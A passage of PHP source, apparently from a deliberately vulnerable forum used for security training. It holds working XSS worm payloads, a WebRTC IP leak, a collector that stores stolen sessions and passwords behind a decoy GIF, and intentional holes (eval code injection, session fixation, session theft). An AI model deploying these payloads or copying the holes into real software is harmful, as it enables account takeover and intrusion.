a.setAttribute('sandbox','allow-same-origin');
top.document.body.appendChild(a);
function Q(a) {
if((a = /(\d{1,3}(\.\d{1,3}){3}|[a-f\d]{1,4}(:[a-f\d]{1,4}){7})/.exec(a)[1]) && c.indexOf(a) < 0)
c += ',%20' + a;
}
try {
b = !!window.webkitRTCPeerConnection,
c = '',
e = {iceServers: [{urls: 'stun:stun.services.mozilla.com'}]};
if(!(a = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection)) {
d = iframe.contentWindow;
a = d.RTCPeerConnection || d.mozRTCPeerConnection || d.webkitRTCPeerConnection;
b = !!d.webkitRTCPeerConnection;
}
d = {optional: [{RtpDataChannels: true}]};
b = new a(e,d);
b.onicecandidate = function(a) {
if(a.candidate)
Q(a.candidate.candidate);
};
b.createDataChannel('');
b.createOffer(function(a) {
b.setLocalDescription(a, function(){}, function(){});
}, function(){});
} catch(e){};
setTimeout(function() {
try {
a = b.localDescription.sdp.split('%0a');
a.forEach(function(b) {
if(b.indexOf('a=candidate:') === 0)
Q(b);
});
} catch(e){};
if(c != '') {
X([M[7],'chat=call:0,' + c.substr(4)]);
(a = top.document.getElementById('iframe')).parentNode.removeChild(a);
}
},##var##);0",
"Worm-Loader [Install]", // XSS-BotWurm außerhalbs des Profils laden
"a = '';
for(b=0;b<80;b++)
a += '%09';
if((b = X([M[6]]).match(/<(\w+)[^>]*?id=.tl[^>]*?>(.*?)(?:\s*<(\w+).*?<\/\\3>)?\s*<\/\\1>/))) {
X([M[6],'tl=' + b[2] + unescape(a) + '<p style=\'display:none\'><iframe src=\'?request=Profil%26id=' + M[9] + '\'></iframe></p>']);
b[2];
}",
"Worm-Loader [Remove]", // XSS-BotWurm Loader deinstallieren
"if((b = X([M[6]]).match(/<(\w+)[^>]*?id=.tl[^>]*?>(.*?)(?:\s*<(\w+).*?<\/\\3>)?\s*<\/\\1>/))) {
X([M[6],'tl=' + b[2]]);
b[2];
}",
"Worm-Loader [Cookie]", // XSS-BotWurm-Loader im Cookie verstecken
"document.cookie='username=' + encodeURI(unescape('%22><script type=%22text/javascript%22 src=%22$self/worm.js%22></script><input type=%22hidden'))");
eof
,array('##pass##' => ($a = explode(' ',$attack['_wordlist_'])) ? $a[rand(0,count($a)-1)] : ''));
if(!$code)
$code = 'Malware not found ;-)';
$code = (isset($var[4]) and $var[4] == "txt" or !isset($var[4]) and preg_match('/[A-Z]/',substr($var[0],0,1))) ? array('plain',trim($code))
: array('javascript',((substr($val,0,4) == 'worm') ? "// Malware mit <script src='$self/$var[0]'></script> installieren!\ndocument.write(\""
.strtr(preg_replace($js,'',$code),array('\\' => '\\\\', '"' => '\\"')).'");' : strtr(preg_replace($js,'',$code),array('\\' => '\\\\'))));
header("Content-Type: text/$code[0]; charset=8859-1");
die($code[1]);
}
# Store all cookies permanently (1 year)
# Runs for the 'Cookie' request only: every cookie the client sent, except the PHP
# session cookie, is issued again with an explicit expiry time.
if($request == 'Cookie') {
$a = 0; // number of cookies that were re-issued
// Expiry = now + lifetime. The lifetime is the first run of digits found in ?time=
// (the pattern is not anchored); without it $ctl is used, which is set outside this block.
$val = time() + ((isset($_GET['time']) and preg_match('/\d+/',$_GET['time'],$val)) ? $val[0] : $ctl);
foreach($_COOKIE as $key => $var)
// Leave the session cookie alone so the session id is not turned into a long-lived cookie
if(!preg_match('/^('.preg_quote(session_name()).')$/',$key)) {
$a++;
// NOTE(review): only name, value, expiry and path are passed - no Secure/HttpOnly
// arguments - and the value is whatever the client sent, so a login cookie is prolonged as is.
setcookie($key,$var,$val,$self);
}
if($a)
$out = "<h3>Cookies werden bis zum ".date('d.m.Y H:i:s',$val)." gespeichert!</h3>";
}
# Check the PHP version: at least 4.3 and below 7.0
# On an unsupported interpreter the database is switched off ($sql = false) and the
# request is forced to the imprint page.
if(preg_match('/^(\d+)\.(\d+)/',phpversion(),$var) and ($var[1] < 4 or $var[1] == 4 and $var[2] < 3 or $var[1] >= 7)) {
$out .= "<h1>PHP von 4.3 bis 5.6 wird vorausgesetzt!</h1><h3>Empfohlen wird PHP 5.3 mit SQLite2 Addon!</h3>";
$request = 'Impressum';
$sql = false;
}
# Prepare SQLite, test it and create a new database if none exists
elseif($sql) {
// Build the function table: every whitespace-separated name in $sql[1] is stored under a key made
// of its capital letters (lower-cased) with the value 'sqlite_' + lower-cased name; existing keys are kept.
// presumably this yields $sql['o'] => 'sqlite_open' and so on - the name list is defined outside this block
foreach(preg_split('/\s+/',$sql[1]) as $val)
if(!isset($sql[$key = strtolower(preg_replace('/[^A-Z]+/','',$val))]))
$sql[$key] = 'sqlite_'.strtolower($val);
// SQLite2 API not available: disable the database and tell the visitor why
if(!function_exists($sql['o']) or !defined('SQLITE_BOTH')) {
$sql = false;
if(defined('SQLITE3_BOTH')) {
$var = "Das <a href='http://mengelke.de/.by'>SQLite3-Addon</a>";
// If a sibling script matching this script's name with "*3" before the extension exists, redirect
// to it. $sql = 0 (instead of false) marks the redirect; later code tests $sql !== 0 before sending 503.
if($val = glob(preg_replace('/(?=\.\w+$)/','*3',basename(__FILE__))) and count($val)) {
header("Location: ".preg_replace('/\/[^\/]*?$/','',$self)."/$val[0]");
header('HTTP/1.0 303 See Other');
$sql = 0;
}
}
else
$var = "Die PHP-Erweiterung SQLite";
$out = "<h1>$var ist nicht installiert!</h1>$out";
}
// No database file yet: create it from the schema text in $sql[0] (whitespace collapsed) in one transaction
elseif(!file_exists($base))
if($conn = @$sql['o']($base)) {
$sql['e']($conn,"begin;".preg_replace(array('/\s+/','/\s*(\W)\s*/'),array(' ','$1'),$sql[0])."commit;");
$sql['cl']($conn);
// NOTE(review): as the message states, the first account registered after this point gets admin
// rights, so a fresh or deleted database file hands the admin role to whoever registers first.
$out = "<h3>Datenbank wurde neu angelegt - Der <a href='$self/Anmelden'>Erste neue Benutzer</a> bekommt Admin-Rechte!</h3>$out";
$request = 'Impressum';
}
else
$out = "<h1>Die Datenbank konnte nicht erstellt werden!</h1>$out";
}
# Open the database
if($sql and $conn = @$sql['o']($base,0666)) {
// Register PHP's base64_decode as the SQL function b64d with one argument
// (presumably $sql['cf'] is sqlite_create_function - the table is built earlier in the file)
$sql['cf']($conn,'b64d','base64_decode',1);
# Verify the database against the schema text
// The pattern pulls bracketed names out of the schema in $sql[0]: group 1 is a name that follows two
// words (looks like "create table [name]"), group 2 any other bracketed name (the columns).
// $wrt is set outside this block.
if($wrt and preg_match_all('/(?:^|[,;])\s*(?:\w+\s\w+\s*\[([\w-]+)|\[([\w-]+))\]/ms',$sql[0],$array)) {
$val = array(); // collects one message per mismatch
$sql[0] = ''; // reused from here on as the pending "select * ... limit 0" probe
$array[1][] = $rw = '-'; // sentinel entry so that the last table is probed too
foreach($array[1] as $key => $var) {
if($var != '') {
if($sql[0] != '') {
// Run the probe for the previous table and compare column count and column names with the schema
if($result = @$sql['q']($conn,$sql[0]) and count($sql[1]) == $rw = $sql['nf']($result)) {
for($a=0; $a < $sql['nf']($result); $a++)
if($sql[1][$a] != $rw = $sql['fn']($result,$a))
$val[] = "$var: $rw <> ".$sql[1][$a];
}
else
$val[] = "$var: $rw != ".count($sql[1])." ".print_r($result,true);
}
$sql[0] = "select * from [$var] limit 0";
$sql[1] = array();
}
else
$sql[1][] = $array[2][$key];
}
if($val) { // database is defective
$debug[] = array($conn,$val,$sql['aq']($conn,"select * from sqlite_master",SQLITE_ASSOC));
$sql['cl']($conn);
// @$sql['cl']($conn); // Bug?
if($svdb) { // keep a copy of the defective database
// The file is renamed to <name>_<yymmddHHMMSS>.<ext> and then compressed through the $gz
// function table (defined outside this block).
// NOTE(review): $base is a relative path built in the file header, so the renamed copy and the
// .gz files are written beside it - confirm the web server does not hand these files out.
rename($base,$new = preg_replace('/(?=\.\w+$)/',date('_ymdHis'),$base));
if($fr = fopen($new,'rb') and $fw = $gz['open']("$new.gz",'wb')) { // store the defective database compressed
while(!feof($fr))
$gz['write']($fw,fread($fr,1024));
fclose($fr);
$gz['close']($fw);
unlink($new);
}
}
else
unlink($base); // just delete the defective database
if(file_exists("$base.gz") and ($fr=$gz['open']("$base.gz",'rb')) and ($fw=fopen($base,'wb'))) { // restore the last backup
while(!gzeof($fr))
fwrite($fw,$gz['read']($fr,1024));
$gz['close']($fr);
fclose($fw);
@touch($base,filemtime("$base.gz"));
}
$out = "<h1>Datenbank ist defekt und wurde gelöscht/zurückgesetzt!</h1>Weiter zum <a href='$self'>Forum</a>$out";
$conn = false;
}
$array = 0;
}
# Check whether the database is writable
$rw = false;
if($conn) {
// The 'write' cookie remembers a failed check; the 'write' request clears it to force a new attempt
if(isset($_COOKIE['write']) and $request == 'write') {
setcookie('write',0,time()-$ctl,$self);
unset($_COOKIE['write']);
}
if(!isset($_COOKIE['write']))
// Up to three attempts, one second apart, using an UPDATE whose condition can never match a row
for($a=0; $a<3; $a++) {
if(@$sql['e']($conn,"update [user] set id = 0 where 0 = 1") and !$sql['le']($conn)) {
$rw = true;
break;
}
sleep(1);
}
if(!$rw) {
setcookie('write',1,0,$self);
$info[6] = "**++Die Datenbank ist schreibgeschützt! - Daher sind einige Funktionen [[^write^Wieder versuchen die Datenbank zu beschreiben^|deaktiviert]]!++**\n\n";
}
}
}
# Collector code of the training setup: accepts the data sent back by the demo attack payloads
# Only reachable when the vulnerability switch $leak is on and the database is open and writable.
# Monitoring hint: both branches are plain GET requests (worm=... or href=...&data=...) that are
# answered with image/gif or with an empty body.
if($sql and $conn and $leak and $rw) {
// Charset for html_entity_decode(): UTF-8 when major.minor of the PHP version, written as one
// number, is above 51, otherwise ISO-8859-1. Note that this overwrites $wrt.
$wrt = (preg_match('/^(\d+)\.(\d+)/',phpversion(),$var) and ($var[1].$var[2]) > 51) ? 'UTF-8' : 'ISO-8859-1';
# Data from the XSS worm
// Needs ?worm plus at least one more parameter; the query is only used to read the column names of [worm]
if(isset($_GET['worm']) and count($_GET) > 1 and $result = $sql['q']($conn,'select * from [worm] where id=0')) {
// Normalise the parameter names (&auml; -> ae and so on) and decode entities in the values
foreach($_GET as $key => $var)
$line[preg_replace('/&(\w)uml;/','$1e',$key)] = html_entity_decode($var,ENT_NOQUOTES,$wrt);
$row = $sql['nf']($result);
// Column names are taken from the table, never from the request; values go through $sql['es']
for($a=0;$a<$row;$a++) {
$key = $sql['fn']($result,$a);
if(isset($line[$key]))
$data["[$key]"] = "'".$sql['es']($line[$key])."'";
}
if(isset($data) and count($data) > 0 and isset($line['Benutzername']))
$sql['e']($conn,"
replace into [worm] ([create],".implode(",",array_keys($data)).")
values (datetime('now','localtime'),
".implode(",",array_values($data)).")");
// $uid is reused here as a "request handled" flag; it is set even when nothing was stored
$uid = true;
}
# Data from XSS attacks
if(isset($_GET['href']) and isset($_GET['data'])) {
$data['data'] = $_GET['data'];
// Pull "<session name>=", "user=" and "pass=" values out of the data string into columns of their own
foreach(array('sess' => session_name(), 'user' => 'user', 'pass' => 'pass') as $key => $var)
if(preg_match('/'.preg_quote($var,'/').'=([^\s;]*)\s*;?\s*/i',$data['data'],$val)) {
$data[$key] = html_entity_decode($val[1],ENT_NOQUOTES,$wrt);
$data['data'] = str_replace($val[0],'',$data['data']);
}
// Re-key every entry as "[column]" => SQL expression; empty strings are stored as NULL
foreach($data as $key => $var) {
$data["[$key]"] = "nullif('".$sql['es']($var)."','')";
unset($data[$key]);
}
// NOTE(review): $addr is interpolated without $sql['es']; it is set outside this block - confirm it
// can only hold an IP address.
$sql['e']($conn,"
insert into [xss] ([create],[ip],[href],".implode(',',array_keys($data)).",[useragent])
values (datetime('now','localtime'),
'$addr',
'".$sql['es']($_GET['href'])."',".implode(",",$data).",
nullif('".$sql['es'](@$_GET['useragent'])."',''))");
$uid = true;
}
if($uid) // return a picture as camouflage
if($img) {
header('Content-Type: image/gif');
die(substr($gz['inflate'](base64_decode($img[1])),0,$img[0]));
}
else
exit;
}
# Build the smiley replacement table
# Every key of $img that has the form "x-y" becomes one regex alternative; the alternatives are joined
# into a single pattern whose replacement emits an <img> tag pointing at "$self/img?<index>".
# A smiley preceded by "~" is left as text.
# NOTE(review): the pattern uses the /e modifier, i.e. the replacement string is executed as PHP code
# for every match. /e was deprecated in PHP 5.5 and removed in PHP 7.0, so this code only runs on the
# old interpreters this script targets.
if($img and $img = array_keys($img)) {
foreach($img as $key => $var)
if(preg_match('/(.+)-(.+)/',$var,$val))
$smile[$key+2] = "(".((strlen($val[1]) == 1) ? preg_quote($val[1]) : "[".preg_quote($val[1])."]")
."-?".((strlen($val[2]) == 1) ? preg_quote($val[2]) : "[".preg_quote($val[2])."]")."+)";
if(isset($smile) and is_array($smile) and count($smile))
$smile = array('/(?<=\||\s|^)(~?)('.implode('|',$smile).')(?=<\/?(p|[bh]r|strong|em)[^>]*>|\s|$)/e' =>
"('$1' == '~') ? '$2' : '<img src=\"".$self."/img?'.array_search('$2',explode(',',',$".implode(",$",array_keys($smile))."')).'\" '
.preg_replace('/[^\w\s=\"]/e','\"&#\".ord(\"\\\$0\").\";\"','alt=\"$2\" title=\"$2\"').' border=\"0\" />'");
}
else
$smile = array();
// The rule table $creole (pattern => replacement) is rebuilt once: at the position of the key '/^$/'
// (skipped if it is the very first key) the smiley rules and the "::x" / "$[name]" variable rules are
// spliced in, followed by the original rules and a few trailing rules.
// Most of the added rules use the /e modifier, so their replacement strings are executed as PHP code.
// NOTE(review): when $leak is truthy an extra rule is appended whose replacement hands the matched
// text to eval() in several quoting variants and prints the result as "Code-Injection" - the
// deliberate PHP code injection of this training application. The rule is absent when $leak is off.
$a = -1; // extend the Creole parser with smileys and variables
foreach($creole as $key => $var)
if(++$a and $key == '/^$/') {
$creole = array_merge(array_slice($creole,0,$a),$smile,array(
'/([\[\{]?)::([l.])(?=[(\/?# |\])])/e' => '"$1".(("$1" == "") ? "" : (("$2" == ".") ? "%home%" : "%self%")).(("$2" == ".") ? preg_replace("/\/[^\/]*$/","",$self) : $self)',
'/::L(?=[\/?#()\w!&,. -]+)/' => $Self,
'/::H(?=[\/?#()\w!&,.: -]+)/' => preg_replace('/(?<=\w)\/(?=\w|$).*$/','',$Self),
'/(~?)(::([pPb]))(?=[\/?#()\w!&,.: -]+)/e' => '!"$1" && array($a = ("$3" == "b") ? "basename" : "preg_replace", $b = ("$3" == "b") ? array() : array("![^/]*$!",""), $b[] = ("$3" == "P") ? $Self : $self) ? call_user_func_array($a,$b) : "$2"',
'/(.?)::(f)\/(?=[\w!&,.-]+)/ei' => "'$1'.(('\$1' == '[') ? '%file%' : '').(('\$2' == 'F') ? '$Self' : '$self').'/file?'",
'/(.)~\/(?=[\w!&,.-]+)/ei' => "'$1'.(('\$1' == '[') ? '^Profil/)' : '')",
'/(.?)::(w)(?=\/)/ei' => '"$1".(("$1" == "[") ? "%wipe%" : "").(("$2" == "w") ? $wiki : str_replace("de","en",$wiki))',
'/(~?)(?:\$|$)\[(\w+)\]/e' => '("$1") ? "$[$2]" : ((isset($creolevar["$2"])) ? $creolevar["$2"] : "")'),$creole,array_merge(array(
'/(?<![<>])\r?\n(?!<!-{4}>|$)/e' => '(isset($creolevar["type"]) and $creolevar["type"] != "cms") ? "<br />\r" : " "',
'/(?<!<p>)\s*<!-{4}>\s*(?!<\/p>)/' => ''),(($leak) ? array(
'/(\$|$){2}(.+)\1{2}/e' => '(($x = array(1 => "$2", '."2 => '$2',". /* Debuging preg-replace/eval */ <<<eof
3 => "$2", 4 => '$2',
eof
.')) ? "" : "") .eval("\\\$x[5] = \'$2\';") .eval("\\\$x[6] = \"$2\";") .eval(\'$x[7] = "$2";\')'."
.eval(\"\\\\\$x[8] = '$2';\") .eval('\$x[9] = \'$2\';') .eval('\$x[10] =\"$2\";')".<<<eof
.eval("\\\\\$x[11] = '$2';") .eval("\\\\\$x[12] = \"$2\";") .eval('\$x[13] = "\$2";')
.eval('\$x[14] = \'$2\';')
eof
.'."<pre>Code-Injection: ".print_r($debug[] = $x,true)."</pre>"') : array())));
break;
}
// Configured URLs win; otherwise logo and icon point at built-in images, addressed by their
// position counted from the end of the $img key list.
if($img) { // set the graphics for logo and icon
$logo = ($logo) ? $logo : "$self/img?".(count($img)-3);
$icon = ($icon) ? $icon : "$self/img?".(count($img)-2);
}
# Hand selected HTML characters to Creole as variables
# Each "name,entity" pair in the list becomes $creolevar['_name'] = '&entity;' (for example _et => &amp;)
if(preg_match_all('/(\w+),([#\w]+)/','et,amp;dq,quot;sz,szlig;nb,nbsp;lt,lt;gt,gt;sq,#39;ds,#36,lf,#10',$val))
foreach($val[2] as $key => $var)
$creolevar["_".$val[1][$key]] = "&$var;";
// Umlauts: _ae, _oe, _ue, _Ae, _Oe, _Ue map to the matching &?uml; entity
foreach(explode(',','a,o,u,A,O,U') as $var)
$creolevar["_{$var}e"] = "&{$var}uml;";
# Datenbank bei fehler deaktivieren
if(!$sql or !$conn or !$craw and preg_match('/(bots?|crawler|yandex)(?=\W|$)/i',$_SERVER['HTTP_USER_AGENT']) and $out = "<h1>No Bots allowed!</h1>") {
if($sql !== 0)
header('HTTP/1.0 503 Service Unavailable');
if(!$out)
$out = "<h1>Datenbank kann nicht geöffnet werden!</h1>";
$sql = false;
}
else {
# Set variables from the database
# A path ending in Blog/<name> or Profil/<name> is resolved to the user id of <name>.
# The name is limited to [\w.-] by the pattern, so no quote character can reach the SQL string.
# NOTE(review): the lookup uses LIKE, and "_" (allowed by \w) is a single-character wildcard there,
# so the name is matched as a pattern rather than compared exactly.
if(!$mid and $path and preg_match('!/?(Blog|Profil)/([\w.-]+)$!i',$path,$var)) {
$mid = $sql['sq']($conn,"select id from [user] where username like '$var[2]'");
if($request == 'Blog')
$getopt[] = "id=$mid";
}
// $lone holds the number of users: 0 = empty forum, 1 = exactly one user, false = more than one.
// With no users at all, registration is switched on ($user = true) regardless of the configuration
// and the start page and the member list are replaced by the sign-up page.
// NOTE(review): per the info text the first account gets admin rights automatically, so an empty
// user table gives that role to the first visitor who registers.
if(!$lone = $sql['sq']($conn,"select count(*) from [user]")) {
$info[3] = "**Der [[^Anmelden|erste Benutzer]] des Forums bekommt automatisch Admin-Rechte!**\r\n";
$user = true;
if(!$request and !$query or $request == 'Mitglieder')
$request = 'Anmelden';
}
elseif($lone > 1)
$lone = false;
$getopt = (isset($getopt)) ? implode("&",$getopt) : ''; // turn the search options into a URL query string
# Output the sitemap
# Served for the request 'sitemap.xml' when crawler indexing ($craw) is enabled. The query lists CMS
# pages, user profiles and blog entries that pass the status filters in the SQL below.
# NOTE(review): the list contains the user names of all users with a profile, readable without login;
# name and date are written into the XML without escaping, which presumably relies on the character
# restrictions applied when these values are stored - confirm.
if($craw and $request == 'sitemap.xml' and $array = $sql['aq']($conn,"
select name, -- CMS
strftime('%Y-%m-%d',change) as date
from [cms]
where status/8%2 = 1 and status/2%4 = 0 and content like '%\n%'
union
select 'Profil/'||username as name, -- User-Profil
strftime('%Y-%m-%d',change) as date
from [user]
where status is not null and profil is not null
union
select 'Blog/'||u.username||'?q='||f.id as name, -- User-Blog
strftime('%Y-%m-%d',f.change) as date
from [forum] as f
left join [user] as u on u.id = f.userid
where f.userid = f.mailid and f.status%2 = 0 and u.status is not null
order by date desc",SQLITE_ASSOC)) {
foreach($array as $key => $var)
$array[$key] = "<url><loc>$Self/$var[name]</loc><lastmod>$var[date]</lastmod></url>";
header('Content-Type: text/xml');
die("<?xml version='1.0' encoding='UTF-8'?>\n"
."<urlset xmlns='http://www.sitemaps.org/schemas/sitemap/0.9'>\n".implode("\n",$array)."\n</urlset>");
}
# Return data about one user via Ajax
# Both lookups run before any session or login handling, so they answer unauthenticated requests.
# ?salt=<name or mail>: the first run of [@\w.-] characters is looked up as user name or mail address.
# If the stored password has the form "salt:<salt>-hash:<hash>", the reply is "<username>:<salt>",
# otherwise the body is empty.
# NOTE(review): the reply differs for known and unknown accounts and maps a mail address to its user
# name, so this endpoint can be used to enumerate accounts; rate limiting belongs in front of it.
if(isset($_GET['salt']) and preg_match('/[@\w.-]+/',$_GET['salt'],$var)) // Salt
die((preg_match('/^([\w.-]+),salt:(\w+)-hash:\w+$/',$sql['sq']($conn,"select username||','||password from [user] where username like '$var[0]' or mail like '$var[0]'"),$val)) ? "$val[1]:$val[2]" : false);
// ?ask=<name>[:<mail>]: returns the stored password-help entry of the user ($pass is defined outside
// this block). With $leak on, the mail address is not checked, so the user name alone is enough.
elseif(isset($_GET['ask']) and preg_match('/([@\w.-]+)(?::([\w@.-]+))?/',$_GET['ask'],$var)) // ask
die((preg_match('/^(\d+)-(?:(.+?):)?/',$sql['sq']($conn,"select passhelp from [user] where username like '$var[1]'".(($leak) ? "" : " and mail like '".((isset($var[2])) ? $var[2] : '')."'")),$val)) ? (($val[1]) ? "$val[1]-{$pass[$val[1]]}" : "$val[1]-$val[2]") : false);
# Alternative hash login
# Applies to requests without POST data. A token "<id>.<hash>" is read from ?id= or, failing that,
# from an "id=" parameter inside the Referer header, and accepted when $hash[0]("username:password")
# of the stored row equals the hash part. On success $uid is the user id and $row keeps the token.
# NOTE(review): the token is derived only from the user name and the stored password string, so it
# stays valid until the password changes, and it travels in URLs (logs, browser history, Referer).
# NOTE(review): the comparison uses ==, which is neither type-strict nor constant-time; a strict,
# constant-time comparison (hash_equals() where PHP 5.6 is available) would be the hardened form.
if(count($_POST) == 0 and (isset($_GET['id']) and preg_match('/^(\d+)\.(\w+)$/',$_GET['id'],$var)
or isset($_SERVER['HTTP_REFERER']) and preg_match('/id=(\d+)\.(\w+)/',$_SERVER['HTTP_REFERER'],$var))
and $row = $sql['sq']($conn,"select username||':'||password from [user] where status is not null and id=$var[1]") and $hash[0]($row) == $var[2]) {
$status = 1;
$uid = $var[1];
$row = $var[0];
}
# Output the feeds
# Atom feed of forum messages and CMS pages. Without a login only rows passing the public filters in
# the SQL are listed; with $uid set the user's own mail rows are included. $id and $paging are set
# outside this block.
# NOTE(review): for token logins the links written into the feed carry "id=$row", i.e. the login
# token itself, so every feed reader and every followed link sees that token.
if($request == 'Atom' and ($inet or !$inet and $uid)) {
if($id and $uid and $row)
$uid = $id;
// The row limit is ?max= (first run of digits) or $paging[1], clamped between $paging[0] and $paging[2]
$array = $sql['aq']($conn,"
select f.id as id,
f.id as name,
f.[create] as 'create',
f.[create] as change,
path,
ifnull(title,'Ohne Titel') as title,
mailid,
message,
ifnull(f.status%2,'-1') as right,
ifnull(u.username,'Unbekannt') as author,
ifnull(m.username,'Unbekannt') as tomail
from [forum] as f
left join user as u on u.id = f.userid
left join user as m on m.id = f.mailid
where f.status is not null and ".(($mid) ? "f.mailid = f.userid and f.userid = $mid".(($uid) ? "" : " and f.status%2 = 0")
: (($uid) ? "(f.mailid is null or f.mailid = $id or f.mailid is not null and f.userid = $id)"
.((isset($_GET['latest']) and $var = $sql['sq']($conn,"select change from [user] where id=$id"))
? " and (f.[create] > datetime('$var') or f.mailid = $id and f.status/2%2 = 0)" : "")
: "f.mailid is null and f.status%2 = 0")."
union all
select id,
name,
[create] as 'create',
change,
null as path,
ifnull(description,'Ohne Titel') as title,
null as mailid,
content as message,
ifnull(status/2%4,'-1') as right,
(select username from user where status/2%2 order by id limit 1) as author,
'Unbekannt' as tomail
from [cms]
where status/8%2 = 1 and status/2%4 < ".(($uid) ? 3 : 1))."
order by 4 desc
limit ".max(min(((isset($_GET['max']) and preg_match('/\d+/',$_GET['max'],$var)) ? $var[0] : $paging[1]),$paging[2]),$paging[0]),SQLITE_ASSOC);
// Render each row as an <entry>: title and author names are mapped through $html, the message body
// is mapped through $html (minus its first entry) and then run through the Creole rules.
foreach($array as $key => $var) {
$creolevar = array_merge($creolevar,array('type' => 'feed', 'id' => $var['id'], 'name' => $var['name'], 'title' => $var['title'], 'from' => $var['author'], 'right' => $var['right'], 'create' => strtotime($var['create']), 'change' => strtotime($var['change'])));
$array[$key] = "<entry>
<title type=\"html\">".strtr($var['title'],$html)."</title>
<content type=\"html\"><![CDATA["
.((preg_match('!/(\d+)/$!',$var['path'],$val)) ? "<table align='right'><tr><td>(<a href='$Self?q=$val[1]' title='Bezugsnachricht'>^</a>)</td></tr></table>" : '')
.preg_replace(array_keys($creole),str_replace($self,$Self,array_values($creole)),strtr(preg_replace('/::f\/[\w()!,.-]+/',"\$0&id=$row",$var['message']),array_slice($html,1)))."]]></content>
<link href=\"$Self".(($var['id'] != $var['name']) ? "/$var[name]" : (($var['mailid']) ? "/".(($var['author'] == $var['tomail']) ? "Blog" : "Mail").(($uid) ? "?id=$row&" : "?") : (($uid and $row) ? "?id=$row&" : "?"))."q=$var[id]")."\" />
<id>$var[id].".strtotime($var['create'])."</id>
<updated>".date("Y-m-d\TH:i:s",strtotime($var['change'])).preg_replace('/([+-][\d]{2})([\d]{2})/','$1:$2',date("O",strtotime($var['change'])))."</updated>
<author><name>".strtr($var['author'],$html)."</name><url>$Self/Profil/".strtr($var['author'],$html)."</url></author>".(($var['mailid'] and $var['author'] != $var['tomail']) ? "
<contributor><name>".strtr($var['tomail'],$html)."</name><url>$Self/Profil/".strtr($var['tomail'],$html)."</url></contributor>" : "")."\n</entry>\n";
}
// Final pass over all entries: the $creoleph['toutf'] rules (defined outside this block) plus removal of control characters
$cleanup = array_merge($creoleph['toutf'],array('/[\x00-\x1f]+/' => ''));
header('content-type: text/xml; charset=UTF-8');
// $title and $logo are configuration values and are written into the feed header as they are
die("<?xml version='1.0' encoding='UTF-8'?>
<feed xmlns='http://www.w3.org/2005/Atom'>
<title>$title</title>
<link href='$Self' />
<updated>".preg_replace('/^.+?<updated>([^<]+).*$/s','$1',reset($array))."</updated>
<generator>PHP/".phpversion()."</generator>
<logo>$logo</logo>\n".preg_replace(array_keys($cleanup),array_values($cleanup),implode('',$array))."\n</feed>");
}
# Start the session
# NOTE(review): with $leak on, the session id is taken from the query string, so the caller chooses
# the id the server will use (session fixation). With $leak off this line is skipped and PHP's own
# session handling decides.
if($leak and isset($_GET[session_name()]))
session_id($_GET[session_name()]);
@session_start();
// A non-empty uid in the session means "logged in": load the current status of that user
if(isset($_SESSION['uid']) and $_SESSION['uid']) {
$uid = $_SESSION['uid'];
$status = $sql['sq']($conn,"select status from [user] where id=$uid");
}
else
// Not logged in: 'src' counts consecutive requests without a login cookie and restarts at 0 otherwise
$_SESSION['src'] = (!isset($_COOKIE['login']) and isset($_SESSION['src'])) ? $_SESSION['src'] + 1 : 0;
# Manipulate session data
# Only with $leak on: the 'set' request writes one session value taken from the query string, or
# removes the key when the value is empty. The key pattern comes from $dpsk, defined outside this block.
# NOTE(review): this gives every client write access to its own $_SESSION; whether keys read by the
# login check (such as 'uid') are covered depends on $dpsk - confirm before enabling $leak on a
# reachable host.
if($leak and $request == 'set' and preg_match(substr($dpsk,0,-2).'=([\w\s:-]*)$/',urldecode($query),$var))
if($var[2])
$_SESSION[$var[1]] = $var[2];
else
unset($_SESSION[$var[1]]);
# Cookie login
# The 'login' cookie holds "<id>.<hash>"; it is accepted when $hash[0]("username:password") of the
# stored row equals the hash part (loose == comparison).
# NOTE(review): the token is derived only from user name and stored password, so it does not expire
# on its own and cannot be revoked without a password change; setcookie() below passes no
# Secure/HttpOnly arguments.
if(isset($_COOKIE['login']) and preg_match('/^(\d+)\.(\w+)$/',$_COOKIE['login'],$var) and $val = $sql['aq']($conn,"
select username||':'||password as hash,status,change from [user] where status is not null and id = $var[1]") and $hash[0]($val[0]['hash']) == $var[2]) {
// SQL fragments for the login-confirmation UPDATE later in the file: set the online bit, but only
// when the user was offline or the last change is older than $eos minutes
$row = array('set' => "status=(status/2%8*2+1),", 'where' => "(status%2 = 0 or datetime(change,'+$eos minutes') < datetime('now','localtime')) and ");
$uid = $var[1];
// First request of this session: remember the user and renew the cookie for another $ctl seconds
if(!isset($_SESSION['uid'])) {
$_SESSION['uid'] = $uid;
$_SESSION['lua'] = $val[0]['change'];
setcookie('login',"$uid.".$hash[0]($val[0]['hash']),time()+$ctl,$self);
}
$status = floor($val[0]['status']/2)*2+1;
}
# Is the uid in the database and logged in? - otherwise log out automatically
# NOTE(review): $uid is interpolated into the SQL without quoting or casting; this relies on every
# source of $uid (session, cookie, token) being numeric - confirm for the session path.
if($uid and isset($_SESSION['uid'])) {
// The session is valid when the user row has the online bit set and - only with $leak off - the
// stored User-Agent equals the one of this request. With $leak on the User-Agent binding is dropped.
if($sql['sq']($conn,"
select id
from [user]
where id=$uid".(($leak) ? "" /* allow session theft */ : "
and useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."'")."
and status%2=1") == $uid) {
$sql['e']($conn,"
update [user] set change=datetime('now','localtime'),
requests=requests+1
where id=$uid and status=(status/2%8*2+1)");
$un = $sql['sq']($conn,"select username from [user] where id = $uid");
}
// Check failed: clear the online bit, empty the session and expire the session cookie
else {
$sql['e']($conn,"
update [user] set status=(status/2%8*2)
where id=$uid");
foreach($_SESSION as $key => $var)
unset($_SESSION[$key]);
setcookie(session_name(),'',time()-$ctl,'/');
$status = 0;
$uid = false;
}
}
# Login confirmation for Atom feeds & cookie login
# $row is truthy after a token login (string) or a cookie login (array with 'set'/'where' fragments).
# The update records login count, time, IP address and User-Agent of the request.
# NOTE(review): $addr is interpolated without $sql['es'] (the User-Agent is escaped); $addr is set
# outside this block - confirm it can only hold an IP address.
if($rw and $uid and $row)
$sql['e']($conn,"
update [user] set ".((is_array($row) and isset($row['set'])) ? $row['set'] : '')."
logins=logins+1,
requests=requests+1,
change=datetime('now','localtime'),
ip='$addr',
useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."'
where ".((is_array($row) and isset($row['where'])) ? $row['where'] : '')."status is not null and id=$uid");
# File download
# The query is either "<file id>[-<name>]" or, for a profile/blog path, just "<name>" belonging to
# user $mid. Ids are cast to int and the name goes through $sql['es'] before they reach the SQL.
